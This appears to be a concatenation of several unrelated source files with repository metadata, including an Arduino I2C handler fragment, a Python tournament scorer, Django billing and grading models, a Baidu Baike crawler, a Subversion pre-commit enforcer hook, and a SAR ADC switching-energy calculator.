elif(data[0] == I2C_CMD.FETCH_ANGLE): #Fetch the angle from the arduino #not needed anymore?
#print(sm_bus.read_byte_data(address, 0))
try:
#Need to preserve the sign to make this sensible, use ctypes for that
data_in = ctypes.c_int8(sm_bus.read_byte_data(address, 0))
#Convert data in from byte to degree angle
data_in = data_in.value/128*180
#Send angle down pipe
input_pipe.send(data_in)
except:
print("SM Bus Error!")
#Clear data
data[0] = 0
#print("Sleep Time: " + str(max(1/I2C_FPS - (time.time() - I2C_Start),0)))
#Frame lock the thread to preserve resources
time.sleep(max(1/I2C_FPS - (time.time() - I2C_Start),0))
#print("I2C_FPS: " + str(int(1/(time.time() - I2C_Start))))
if __name__== "__main__":
Serial_pipe_1, Serial_pipe_2 = mp.Pipe(duplex = True)
comms = mp.Process(target = Serial_Handler, args=(Serial_pipe_2,))
comms.start()
Serial_pipe_1.send([ARDU_CMD.SEND, 123,456])
Serial_pipe_1.send([ARDU_CMD.SEND, 456,123])
Serial_pipe_1.send([ARDU_CMD.SEND, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
choar = input()
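    #Illustrative sketch (assumed LCD size and Arduino address; not part of the
    #original demo): the I2C handler is driven the same way through a duplex pipe.
    #    I2C_pipe_1, I2C_pipe_2 = mp.Pipe(duplex = True)
    #    lcd = mp.Process(target = I2C_Handler, args=(I2C_pipe_2, (2, 16), 0x08))
    #    lcd.start()
    #    I2C_pipe_1.send([I2C_CMD.LCD_CLR_MSG, "Hello"])   #clear the LCD and show text
    #    I2C_pipe_1.send([I2C_CMD.FETCH_ANGLE, 0])         #angle reply arrives on the pipe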
|
[
"cameronkramr@mines.edu"
] |
cameronkramr@mines.edu
|
e7402159b694a4820f2b00e2af214a79f9043612
|
e965225b5b16feb3a8264980cdeff83342e1167c
|
/pythontask.py
|
a4b01f83681283f4550677aedce2dd6b39d9b2de
|
[] |
no_license
|
challapavankumar/Archeville-Super-Archy-Tournament-task
|
7b8631fe448f04f9ed335327e1a2457c3bc8e5cf
|
d646a830865f5607193ca883a217974fb4e5a641
|
refs/heads/main
| 2023-01-31T15:03:21.658700
| 2020-12-18T06:11:14
| 2020-12-18T06:11:14
| 322,502,956
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,858
|
py
|
rounds = int(input("No of rounds to play "))
scores={"A":50,"B":4,"C":3,"D":2,"E":1,"F":0}
bonuscheck=[]
bonusplayer=[]
teams={"Gyrhuna":[{"Jaons Diak":0},{"Susu":0}],
"Achni":[{"Milog":0},{"Tianlong":0}],
"Bathar":[{"Pakhangba":0},{"Poubi Lai Paphal":0}]}
teamno=len(teams)
bonusteam={}
teamscore={}
def WhoWonTheMatch(teamscore):
return [key for (key, value) in teamscore.items() if value == max(teamscore.values())]
for team in teams:
bonusteam[team]=0
teamscore[team]=0
players=0
for i in teams:
players+=len(teams[i])
playerscores={}
for r in range(rounds):
for team in teams:
bonuscheck=[]
bonusplayer=[]
teamscore[team]=0
for pl in teams[team]:
key, value = list(pl.items())[0]
temp=0
playerscore=(input("Enter the score of " +str(key)+str(" from team ")+team+" "))
if playerscore not in (["A","B","C","D","E","F"]):
print("Please select the score from A-F")
exit(0)
bonuscheck.append(playerscore)
bonusplayer.append(key)
prefix=key
if prefix not in playerscores:
playerscores[prefix]=scores[playerscore]
else:
playerscores[prefix]+=scores[playerscore]
temp=playerscores[prefix]
teamscore[team]+=playerscores[prefix]
if(len(set(bonuscheck))==1):
bonusteam[team]+=2
teamscore[team]+=bonusteam[team]
scores={key:value+1 if(key!="F") else value for key,value in(scores.items()) }
print(playerscores)
print(bonusteam)
print(teamscore)
print("Next Round")
key=WhoWonTheMatch(teamscore)[0]
print("Game over. {} won!!!".format(key))
|
[
"noreply@github.com"
] |
challapavankumar.noreply@github.com
|
3a605cd5f0f7781f3d75d4937b802eac9ac2dd09
|
4accbb2bb2f7cc2b6b5855afe52c1bb4561c8da6
|
/Unstructured Programs For Testing/CSVtoNumpy2.py
|
85b4f08e7b464e239c7ab173dd45a90b55e10ebf
|
[] |
no_license
|
WrathTitan/DLNeuralNetwork
|
e993f37faca865c369138ea61b346f9a998ad690
|
c82ba35c1cf6cd20c573200d4c3f038e8f434d9e
|
refs/heads/master
| 2023-04-04T06:50:19.007794
| 2021-04-23T16:18:10
| 2021-04-23T16:18:10
| 307,389,978
| 0
| 0
| null | 2020-10-29T16:24:58
| 2020-10-26T13:57:02
|
Python
|
UTF-8
|
Python
| false
| false
| 565
|
py
|
import numpy as np
import csv
myarr=np.genfromtxt('superfilteredFinal.csv',delimiter=',')
print(myarr)
print(myarr.shape)
print(myarr.T)
print("Ended one file")
mynewarr=np.genfromtxt('filteredFinal.csv',delimiter=',')
awesomestuff=mynewarr[:,1:]
print(awesomestuff)
print(awesomestuff.shape)
print(awesomestuff.T)
#my_data=pd.read_csv('superfilteredFinal.csv',sep=',',header=None)
#data_X=my_data.T
#print(data_X)
#print(data_X.shape)
#my_data=pd.read_csv('filteredFinal.csv',sep=',',header=None).T
#data_Y=my_data.iloc[1:,]
#print(data_Y)
#print(data_Y.shape)
|
[
"rishabhbhatt159@gmail.com"
] |
rishabhbhatt159@gmail.com
|
1c6ff28e26ea56bf58d2d64410f7f7ccc128b1c3
|
a51854991671a4389902945578288da34845f8d9
|
/libs/Utility/__init__.py
|
413df21a5385589d95b5c2ec9bf735a694a5e504
|
[] |
no_license
|
wuyou1102/DFM_B2
|
9210b4b8d47977c50d92ea77791f477fa77e5f83
|
69ace461b9b1b18a2269568110cb324c04ad4266
|
refs/heads/master
| 2020-04-13T18:54:20.045734
| 2019-06-17T12:46:23
| 2019-06-17T12:46:23
| 163,387,873
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 297
|
py
|
# -*- encoding:UTF-8 -*-
from libs.Utility import Logger
import Alert as Alert
import Random as Random
from ThreadManager import append_thread
from ThreadManager import is_alive
from ThreadManager import query_thread
from Common import *
import ParseConfig as ParseConfig
from Serial import Serial
|
[
"jotey@qq.com"
] |
jotey@qq.com
|
d57c68ff01ec5c6b974091d91da38f8ac7708ec3
|
26371093460ea3026cdcd74e624b0c2d4b1d5892
|
/Staff.py
|
2fae3241689d94a0185840d38b2a6b21e9b9a6a3
|
[] |
no_license
|
meyerkeaton/ktmcbk
|
0b636b1bc8e8be022f6423d88776191a606949c7
|
5bca15495ee1066658c59ae24c15be4028f8a4ff
|
refs/heads/main
| 2022-12-28T05:41:09.453076
| 2020-10-15T05:09:20
| 2020-10-15T05:09:20
| 304,215,581
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 883
|
py
|
import json
import User
class Staff(User.User):
def update_course_db(self):
with open('Data/courses.json', 'w') as fp:
json.dump(self.all_courses, fp)
def create_assignment(self,assignment_name, due_date, course):
assignment = {
assignment_name: {
'due_date': due_date
}
}
self.all_courses[course]['assignments'].update(assignment)
self.update_course_db()
def change_grade(self,user,course,assignment,grade):
        self.users[user]['courses'][course][assignment]['grade'] = grade
self.update_user_db()
def check_grades(self,name,course):
assignments = self.users[name]['courses'][course]
grades = []
for key in assignments:
grades.append([key, assignments[key]['grade']])
return grades
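    # Illustrative data shapes assumed by these methods (hypothetical values):
    #   self.all_courses = {"CS101": {"assignments": {"HW1": {"due_date": "2020-10-20"}}}}
    #   self.users = {"alice": {"courses": {"CS101": {"HW1": {"grade": 95}}}}}
    # so check_grades("alice", "CS101") would return [["HW1", 95]].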
|
[
"noreply@github.com"
] |
meyerkeaton.noreply@github.com
|
b799cd1b2094b8b6d385a69a3678787901adbe06
|
471e1738186b51373aa73057d91bbdb2575be6d6
|
/anuario/pesquisador/admin.py
|
fd6fa9091a51a4000f772d4e4fb55386e31f74a4
|
[] |
no_license
|
pixies/portal-anuario-pesquisa
|
1939c074ba9a70d715c0c48b07741364161a77b8
|
38873ec820ac75977ba2f989b1a472e1b9c62a4a
|
refs/heads/master
| 2021-01-12T17:49:37.337465
| 2016-09-29T17:10:05
| 2016-09-29T17:10:05
| 69,398,984
| 0
| 0
| null | 2016-09-27T21:11:15
| 2016-09-27T21:11:15
| null |
UTF-8
|
Python
| false
| false
| 209
|
py
|
from django.contrib import admin
from .models import Pesquisador, Curso, Instituicao
# Register your models here.
admin.site.register(Pesquisador)
#admin.site.register(Curso)
#admin.site.register(Instituicao)
|
[
"eu@cflb.co"
] |
eu@cflb.co
|
bcfca9b47c82bc52528894a9459bda4232f48196
|
f582461cc398909906a1ca65fa250105319289d8
|
/spider_main.py
|
986f58a635f53e9861335c7fe8c902f544f9017e
|
[] |
no_license
|
ITT13021/baike_spider
|
d0dd637074c99cd7a1b9d703b4406939ed745fbd
|
2a2eea68dd94bf15ec1769986554514c53a28854
|
refs/heads/master
| 2021-07-04T12:33:37.377379
| 2017-09-27T01:49:00
| 2017-09-27T01:49:00
| 104,868,967
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,568
|
py
|
# coding=utf-8
from baike_spider import html_downloader
from baike_spider import html_outputer
from baike_spider import html_parser
from baike_spider import url_manager
class SpriderMain(object):
def __init__(self):
self.urls = url_manager.UrlManager()
self.downloader = html_downloader.HtmlDownloader()
self.parser = html_parser.HtmlParser()
self.outputer = html_outputer.HtmlOutputer()
def craw(self, root_url, count):
i = 1
self.urls.add_new_url(root_url)
while self.urls.has_new_url():
if count != 0:
try:
new_url = self.urls.get_new_url()
print 'we are collecting in %d : %s' % (i, new_url)
html_cont = self.downloader.download(new_url)
new_urls, new_data = self.parser.parse(new_url, html_cont)
self.urls.add_new_urls(new_urls)
self.outputer.collect_data(new_data)
except:
print "collected failed in %d" % i
i += 1
count -= 1
else:
break
self.outputer.output_html()
if __name__ == "__main__":
obj_spider = SpriderMain()
root_url = raw_input("请输入您要爬取首个百度百科词条的页面,我们会搜索与其相关的词条,例如:https://baike.baidu.com/item/Python:" + "\n")
count = input("请输入您要爬取词条的个数(爬取越多消耗时间越长哦!): ")
obj_spider.craw(root_url, count)
|
[
"473457683@qq.com"
] |
473457683@qq.com
|
04a4e80f246a131d68d2616fcf175a178c694d71
|
d87d83049f28da72278ca9aa14986db859b6c6d6
|
/basic/coreFundamental/split_And_Join_And_strip/splitDemo.py
|
91db33efa0f6d30926f416fb183b4cd31e8ff63d
|
[] |
no_license
|
MonadWizard/python-basic
|
6507c93dc2975d6450be27d08fb219a3fd80ed64
|
624f393fcd19aeeebc35b4c2225bb2fe8487db39
|
refs/heads/master
| 2021-07-21T16:12:58.251456
| 2020-10-12T19:46:21
| 2020-10-12T19:46:21
| 223,625,523
| 1
| 0
| null | 2019-11-23T18:01:43
| 2019-11-23T17:14:21
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,046
|
py
|
s = 'this is a string of words'
print(s.split())
print("""
""")
print('That is also a string'.split())
print("""
""")
print(s.split('i'))
print("""
""")
words = s.split()
print(words)
for w in words:
print(w)
# rsplit
demo = "this is a fucked up"
rsplitee = demo.rsplit(sep=" ", maxsplit=2)
print(rsplitee)
# split with maxsplit (plain split already works from the left)
demo = "this is a fucked up"
lsplitee = demo.split(sep=" ", maxsplit=2)
print(lsplitee)
# splitlines splits on \n
demo = "this is a fucked up\nfucking univers"
nsplitee = demo.splitlines()
print(nsplitee)
# test
file = """mtv films election, a high school comedy, is a current example
from there, director steven spielberg wastes no time, taking us into the water on a midnight swim
"""
file_split = file.splitlines()
# Print file_split
print(file_split)
# Complete for-loop to split by commas
for substring in file_split:
substring_split = substring.split(",")
print(substring_split)
|
[
"monad.wizar.r@gmail.com"
] |
monad.wizar.r@gmail.com
|
940dfcffd7da2f2431e4e7d093e93c7a44d5ca3b
|
9699ff2d4f407746c80c507f158da02f5ab9596a
|
/subversion/contrib/hook-scripts/enforcer/.svn/text-base/enforcer.svn-base
|
caacf749ddd37057e18c2fd432789b0043a5914f
|
[
"BSD-3-Clause",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"X11"
] |
permissive
|
AsherBond/MondocosmOS-Dependencies
|
7af67e41ae60b578800fc4184fa69a6b44da1715
|
bfd2554e6c2cfc4bc1ecb2b653594ca9f0448392
|
refs/heads/master
| 2021-01-23T13:53:07.122515
| 2011-10-03T13:22:43
| 2011-10-03T13:22:43
| 2,504,513
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,260
|
#!/usr/bin/python
# -*- coding:utf-8;mode:python;mode:font-lock -*-
##
# Utility for Subversion commit hook scripts
# This script enforces certain coding guidelines
##
# Copyright (c) 2005 Wilfredo Sanchez Vega <wsanchez@wsanchez.net>.
# All rights reserved.
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHORS DISCLAIM ALL
# WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE
# AUTHORS BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL
# DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR
# PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER
# TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
##
import sys
import os
import getopt
import popen2
#
# FIXME: Should probably retool this using python bindings, not svnlook
#
__doc__ = '''
Enforcer is a utility which can be used in a Subversion pre-commit
hook script to enforce various requirements which a repository
administrator would like to impose on data coming into the repository.
A couple of example scenarios:
- In a Java project I work on, we use log4j extensively. Use of
System.out.println() bypasses the control that we get from log4j,
so we would like to discourage the addition of println calls in our
code.
We want to deny any commits that add a println into the code. The
world being full of exceptions, we do need a way to allow some uses
of println, so we will allow it if the line of code that calls
println ends in a comment that says it is ok:
System.out.println("No log4j here"); // (authorized)
We also do not (presently) want to refuse a commit to a file which
already has a println in it. There are too many already in the
code and a given developer may not have time to fix them up before
commiting an unrelated change to a file.
- The above project uses WebObjects, and you can enable debugging in
a WebObjects component by turning on the WODebug flag in the
component WOD file. That is great for debugging, but massively
bloats the log files when the application is deployed.
We want to disable any commit of a file enabling WODebug,
regardless of whether the committer made the change or not; these
have to be cleaned up before any successful commit.
What this script does is it uses svnlook to peek into the transaction
is progress. As it sifts through the transaction, it calls out to a
set of hooks which allow the repository administrator to examine what
is going on and decide whether it is acceptable. Hooks may be written
(in Python) into a configuration file. If the hook raises an
exception, enforcer will exit with an error status (and presumably the
commit will be denied by th pre-commit hook). The following hooks are
available:
verify_file_added(filename)
- called when a file is added.
verify_file_removed(filename)
- called when a file is removed.
verify_file_copied(destination_filename, source_filename)
- called when a file is copied.
verify_file_modified(filename)
- called when a file is modified.
verify_line_added(filename, line)
- called for each line that is added to a file.
(verify_file_modified() will have been called on the file
beforehand)
verify_line_removed(filename, line)
- called for each line that is removed from a file.
(verify_file_modified() will have been called on the file
beforehand)
verify_property_line_added(filename, property, line)
- called for each line that is added to a property on a file.
verify_property_line_removed(filename, property, line)
- called for each line that is removed from a property on a file.
In addition, these functions are available to be called from within a
hook routine:
open_file(filename)
- Returns an open file-like object from which the data of the given
file (as available in the transaction being processed) can be
read.
In our example scenarios, we can deny the addition of println calls by
hooking into verify_line_added(): if the file is a Java file, and the
added line calls println, raise an exception.
Similarly, we can deny the commit of any WOD file enabling WODebug by
hooking into verify_file_modified(): open the file using open_file(),
then raise if WODebug is enabled anywhere in the file.
Note that verify_file_modified() is called once per modified file,
whereas verify_line_added() and verify_line_removed() may each be
called zero or many times for each modified file, depending on the
change. This makes verify_file_modified() appropriate for checking
the entire file and the other two appropriate for checking specific
changes to files.
These example scenarios are implemented in the provided example
configuration file "enforcer.conf".
When writing hooks, it is usually easier to test the hooks on committed
transactions already in the repository, rather than installing the
hook and making commits to test the them. Enforcer allows you to
specify either a transaction ID (for use in a hook script) or a
revision number (for testing). You can then, for example, find a
revision that you would like to have blocked (or not) and test your
hooks against that revision.
'''
__author__ = "Wilfredo Sanchez Vega <wsanchez@wsanchez.net>"
##
# Handle command line
##
program = os.path.split(sys.argv[0])[1]
debug = 0
transaction = None
revision = None
def usage(e=None):
if e:
print e
print ""
print "usage: %s [options] repository config" % program
print "options:"
print "\t-d, --debug Print debugging output; use twice for more"
print "\t-r, --revision rev Specify revision to check"
print "\t-t, --transaction txn Specify transaction to check"
print "Exactly one of --revision or --transaction is required"
sys.exit(1)
# Read options
try:
(optargs, args) = getopt.getopt(sys.argv[1:], "dt:r:", ["debug", "transaction=", "revision="])
except getopt.GetoptError, e:
usage(e)
for optarg in optargs:
(opt, arg) = optarg
if opt in ("-d", "--debug" ): debug += 1
elif opt in ("-t", "--transaction"): transaction = arg
elif opt in ("-r", "--revision" ): revision = arg
if transaction and revision:
usage("Cannot specify both transaction and revision to check")
if not transaction and not revision:
usage("Must specify transaction or revision to check")
if not len(args): usage("No repository")
repository = args.pop(0)
if not len(args): usage("No config")
configuration_filename = args.pop(0)
if len(args): usage("Too many arguments")
##
# Validation
# All rule enforcement goes in these routines
##
def open_file(filename):
"""
Retrieves the contents of the given file.
"""
cat_cmd = [ "svnlook", "cat", None, repository, filename ]
if transaction: cat_cmd[2] = "--transaction=" + transaction
elif revision: cat_cmd[2] = "--revision=" + revision
else: raise ValueError("No transaction or revision")
cat_out, cat_in = popen2.popen2(cat_cmd)
cat_in.close()
return cat_out
def verify_file_added(filename):
"""
Here we verify file additions which may not meet our requirements.
"""
if debug: print "Added file %r" % filename
if configuration.has_key("verify_file_added"):
configuration["verify_file_added"](filename)
def verify_file_removed(filename):
"""
Here we verify file removals which may not meet our requirements.
"""
if debug: print "Removed file %r" % filename
if configuration.has_key("verify_file_removed"):
configuration["verify_file_removed"](filename)
def verify_file_copied(destination_filename, source_filename):
"""
Here we verify file copies which may not meet our requirements.
"""
if debug: print "Copied %r to %r" % (source_filename, destination_filename)
if configuration.has_key("verify_file_copied"):
configuration["verify_file_copied"](destination_filename, source_filename)
def verify_file_modified(filename):
"""
Here we verify files which may not meet our requirements.
Any failure, even if not due to the specific changes in the commit
will raise an error.
"""
if debug: print "Modified file %r" % filename
if configuration.has_key("verify_file_modified"):
configuration["verify_file_modified"](filename)
def verify_line_added(filename, line):
"""
Here we verify new lines of code which may not meet our requirements.
Code not changed as part of this commit is not verified.
"""
if configuration.has_key("verify_line_added"):
configuration["verify_line_added"](filename, line)
def verify_line_removed(filename, line):
"""
Here we verify removed lines of code which may not meet our requirements.
Code not changed as part of this commit is not verified.
"""
if configuration.has_key("verify_line_removed"):
configuration["verify_line_removed"](filename, line)
def verify_property_line_added(filename, property, line):
"""
Here we verify added property lines which may not meet our requirements.
Code not changed as part of this commit is not verified.
"""
if debug: print "Add %s::%s: %s" % (filename, property, line)
if configuration.has_key("verify_property_line_added"):
configuration["verify_property_line_added"](filename, property, line)
def verify_property_line_removed(filename, property, line):
"""
Here we verify removed property lines which may not meet our requirements.
Code not changed as part of this commit is not verified.
"""
if debug: print "Del %s::%s: %s" % (filename, property, line)
if configuration.has_key("verify_property_line_removed"):
configuration["verify_property_line_removed"](filename, property, line)
##
# Do the Right Thing
##
configuration = {"open_file": open_file}
execfile(configuration_filename, configuration, configuration)
diff_cmd = [ "svnlook", "diff", None, repository ]
if transaction: diff_cmd[2] = "--transaction=" + transaction
elif revision: diff_cmd[2] = "--revision=" + revision
else: raise ValueError("No transaction or revision")
diff_out, diff_in = popen2.popen2(diff_cmd)
diff_in.close()
try:
state = 0
#
# This is the svnlook output parser
#
for line in diff_out:
if line[-1] == "\n": line = line[:-1] # Zap trailing newline
# Test cases:
# r2266: Added text files, property changes
# r18923: Added, deleted, modified text files
# r25692: Copied files
# r7758: Added binary files
if debug > 1: print "%4d: %s" % (state, line) # Useful for testing parser problems
if state is -1: # Used for testing new states: print whatever is left
print line
continue
if state in (0, 100, 300): # Initial state or in a state that may return to initial state
if state is 0 and not line: continue
colon = line.find(":")
if state is not 300 and colon != -1 and len(line) > colon + 2:
action = line[:colon]
filename = line[colon+2:]
if action in (
"Modified",
"Added", "Deleted", "Copied",
"Property changes on",
):
if action == "Modified": verify_file_modified(filename)
elif action == "Added" : verify_file_added (filename)
elif action == "Deleted" : verify_file_removed (filename)
elif action == "Copied":
i = filename.find(" (from rev ")
destination_filename = filename[:i]
filename = filename[i:]
i = filename.find(", ")
assert filename[-1] == ")"
source_filename = filename[i+2:-1]
verify_file_copied(destination_filename, source_filename)
filename = destination_filename
if action == "Modified" : state = 10
elif action == "Added" : state = 10
elif action == "Deleted" : state = 10
elif action == "Copied" : state = 20
elif action == "Property changes on": state = 30
else: raise AssertionError("Unknown action")
current_filename = filename
current_property = None
continue
assert state in (100, 300)
if state is 10: # Expecting a bar (follows "(Added|Modified|Deleted):" line)
assert line == "=" * 67
state = 11
continue
if state is 11: # Expecting left file info (follows bar)
if line == "": state = 0
elif line == "(Binary files differ)": state = 0
elif line.startswith("--- "): state = 12
else: raise AssertionError("Expected left file info, got: %r" % line)
continue
if state is 12: # Expecting right file info (follows left file info)
assert line.startswith("+++ " + current_filename)
state = 100
continue
if state is 20: # Expecting a bar or blank (follows "Copied:" line)
# Test cases:
# r25692: Copied and not modified (blank)
# r26613: Copied and modified (bar)
if not line:
state = 0
elif line == "=" * 67:
state = 11
else:
raise AssertionError("After Copied: line, neither bar nor blank: %r" % line)
continue
if state is 100: # Expecting diff data
for c, verify in (("-", verify_line_removed), ("+", verify_line_added)):
if len(line) >= 1 and line[0] == c:
try: verify(current_filename, line[1:])
except Exception, e:
sys.stderr.write(str(e))
sys.stderr.write("\n")
sys.exit(1)
break
else:
if (
not line or
(len(line) >= 4 and line[:2] == "@@" == line[-2:]) or
(len(line) >= 1 and line[0] == " ") or
line == "\\ No newline at end of file"
):
continue
raise AssertionError("Expected diff data, got: %r" % line)
continue
if state is 30: # Expecting a bar (follows "Property changes on:" line)
assert line == "_" * 67
state = 31
continue
if state is 31: # Expecting property name (follows bar)
for label in (
"Name", # svn versions < 1.5
"Added", "Modified", "Deleted" # svn versions >= 1.5
):
if line.startswith(label + ": "):
break
else:
raise AssertionError("Unexpected property name line: %r" % line)
state = 300
# Fall through to state 300
if state is 300:
if not line:
state = 0
continue
for label in (
"Name", # svn versions < 1.5
"Added", "Modified", "Deleted" # svn versions >= 1.5
):
if line.startswith(label + ": "):
current_property = line[len(label)+2:]
current_verify_property_function = None
break
else:
for prefix, verify in (
(" - ", verify_property_line_removed),
(" + ", verify_property_line_added)
):
if line.startswith(prefix):
try: verify(current_filename, current_property, line[5:])
except Exception, e:
sys.stderr.write(str(e))
sys.stderr.write("\n")
sys.exit(1)
current_verify_property_function = verify
break
else:
if not line: continue
if current_verify_property_function is None:
raise AssertionError("Expected property diff data, got: %r" % line)
else:
# Multi-line property value
current_verify_property_function(current_filename, current_property, line)
continue
raise AssertionError("Unparsed line: %r" % line)
if debug: print "Commit is OK"
finally:
for line in diff_out: pass
diff_out.close()
|
[
"asherbond@asherbond.com"
] |
asherbond@asherbond.com
|
|
653e1569defce82bd7cefae6b2b508f8851295a1
|
af4b590504660a302f53a6fd99a5cb2e1244b85f
|
/src/billing/models.py
|
d6325f0ceba818542cbc794137a9674a6eddcd9c
|
[] |
no_license
|
qkhan/NewEcommerce
|
3216da9e80567f9c548efcac0dd00ee754399848
|
12f40adf071471bdc30d76e07bc563949c5f5d19
|
refs/heads/master
| 2020-03-09T22:59:24.568434
| 2018-04-11T06:52:10
| 2018-04-11T06:52:10
| 129,048,139
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,701
|
py
|
from django.conf import settings
from django.db import models
from accounts.models import GuestEmail
from django.db.models.signals import pre_save, post_save
User = settings.AUTH_USER_MODEL
class BillingProfileManager(models.Manager):
def new_or_get(self, request):
user = request.user
guest_email_id = request.session.get('guest_email_id')
print("Guest email id: ", guest_email_id)
created = False
obj = None
if user.is_authenticated():
'logged in user checkout; remember payment stuff'
obj, created = self.model.objects.get_or_create(user=user, email=user.email)
#print("Billing Profile:", billing_profile, " | ", billing_profile_created)
elif guest_email_id is not None:
'guest user checkout; auto reloads payment stuff'
guest_email_obj = GuestEmail.objects.get(id=guest_email_id)
obj, created = self.model.objects.get_or_create(email=guest_email_obj.email)
else:
pass
return obj, created
# Create your models here.
class BillingProfile(models.Model):
user = models.OneToOneField(User, null=True, blank=True)
email = models.EmailField()
active = models.BooleanField(default=True)
update = models.DateTimeField(auto_now=True)
timestamp = models.DateTimeField(auto_now_add=True)
objects = BillingProfileManager()
def __str__(self):
return self.email
def user_created_receiver(sender, instance, created, *args, **kwargs):
if created and instance.email:
BillingProfile.objects.get_or_create(user=instance, email=instance.email)
post_save.connect(user_created_receiver, sender=User)
|
[
"qaisarkhan@Qaisars-iMac.local"
] |
qaisarkhan@Qaisars-iMac.local
|
d8aac991213a5218618098233100d5a23603c036
|
9d48dc6e54f959285ed3ab15006d664d42db7c01
|
/assistant_module/get_energy.py
|
17e7b4311937c5f4041a66ce17b38da77f929ad5
|
[] |
no_license
|
sandylaker/saradc_toolbox
|
d971936ec5b13fb467f991b351b30fccad00876a
|
b7b8f3d6c15a7c522cd89267739318c78e4d6a37
|
refs/heads/master
| 2020-03-27T11:42:29.520183
| 2018-09-15T21:03:47
| 2018-09-15T21:03:47
| 146,503,308
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,098
|
py
|
import numpy as np
from assistant_module.get_decision_path import get_decision_path
def get_energy(n, switch='conventional', structure='conventional'):
"""
get the energy consumption of every code, each code represents the possible decision level before the last
decision(a odd decimal integer).
:param n: resolution of DAC
:param switch: switching method: 'conventional': conventional one-step switching
'monotonic': monotonic capacitor switching, in each transition step, only one
capacitor in one side is switched.
'mcs': merged capacitor switching
'split': split-capacitor method. The MSB capacitor is split into a copy of the
rest of the capacitor array. When down-switching occurs, only the
corresponding capacitor in the sub-capacitor array is discharged to the
ground
:param structure: structure of ADC: 'conventional': conventional single-ended structure
'differential': has two arrays of capacitors, the switch states of positive and
negative side are complementary. The energy consumption is two
times of that in the conventional structure, if conventional
switching method is used.
:return: a ndarray, each element represents the energy consumption of each code.
"""
# possible decision level before the last comparison
code_decimal = np.arange(1, 2 ** n, 2)
decision_path = get_decision_path(n) # two-dimensional
# store the switching energy of each code
sw_energy_sum = np.zeros(len(code_decimal))
if switch == 'conventional':
coefficient = 1
if structure == 'differential':
# the switching states of both sides are complementary, so the energy consumption is twice that of
# the conventional (single-ended) structure.
coefficient = 2
for i in range(len(code_decimal)):
# weight of each decision threshold layer
weights_ideal = [0.5 ** (i + 1) for i in range(n)]
sw_energy = np.zeros(n)
sw_energy[0] = 0.5 * decision_path[i, 0]
# calculate the energy for up-switching steps
# 1 is the index offset
sw_up_pos = np.where(
decision_path[i, 1:] > decision_path[i, 0:-1])[0] + 1
# print(code_decimal[i],' sw_up_pos: ',sw_up_pos)
if not sw_up_pos.size == 0:
# sw_energy[sw_up_pos] = decision_path[i,sw_up_pos]*(-1)*(weights_ideal[sw_up_pos])+ 2**(n-1-sw_up_pos)
# 2**(n-1-sw_up_pos) stands for E_sw = C_up*V_ref^2
for k in sw_up_pos:
# \delta V_x is positive,so *(-1)
sw_energy[k] = decision_path[i, k] * \
(-1) * (weights_ideal[k]) + 2**(n - 1 - k)
sw_dn_pos = np.where(
decision_path[i, 1:] < decision_path[i, 0:-1])[0] + 1
# print(code_decimal[i],' sw_dn_pos: ',sw_dn_pos)
if not sw_dn_pos.size == 0:
# sw_energy[sw_dn_pos] = decision_path[i,sw_dn_pos]*(-1)*(weights_ideal[sw_dn_pos]) + 2**(n-1-sw_dn_pos)
for k in sw_dn_pos:
sw_energy[k] = decision_path[i, k] * \
(weights_ideal[k]) + 2**(n - 1 - k)
# print(code_decimal[i],': ',sw_energy)
sw_energy_sum[i] = np.sum(sw_energy)
return coefficient * sw_energy_sum
if switch == 'monotonic':
if structure == 'conventional':
raise Exception(
'Conventional(single-ended) structure does not support monotonic switching.')
for i in range(len(code_decimal)):
# the total capacitance of positive and negative sides
c_tp = c_tn = 2 ** (n - 1)
# vx unchanged in the first step
weights_ideal = np.concatenate(
([0], [0.5 ** j for j in range(1, n)]))
sw_energy = np.zeros(n)
sw_energy[0] = 0
# define an array to store the switching types(up or down) of each
# step.
sw_process = np.zeros(n)
# find the up-switching and down-switching steps
# 1 is the index offset
sw_up_pos = np.where(
decision_path[i, 1:] > decision_path[i, 0:-1])[0] + 1
sw_dn_pos = np.where(
decision_path[i, 1:] < decision_path[i, 0:-1])[0] + 1
sw_process[sw_up_pos], sw_process[sw_dn_pos] = 1, 0
for k in range(1, n):
# if up-switching occurs, a capacitor on the p-side is connected to ground while the n-side remains
# unchanged; if down-switching occurs, a capacitor on the n-side is connected to ground while the
# p-side remains unchanged. Note: the loop is range(1, n), so when k starts from 1 the first
# capacitor switched to ground is 2**(n-2)*C0 (the MSB capacitor differs from the one in the
# conventional case).
c_tp = c_tp - 2**(n - 1 - k) * sw_process[k]
c_tn = c_tn - 2**(n - 1 - k) * (1 - sw_process[k])
sw_energy[k] = c_tp * (-1) * (- weights_ideal[k]) * sw_process[k] + \
c_tn * (-1) * (- weights_ideal[k]) * (1 - sw_process[k])
sw_energy_sum[i] = np.sum(sw_energy)
return sw_energy_sum
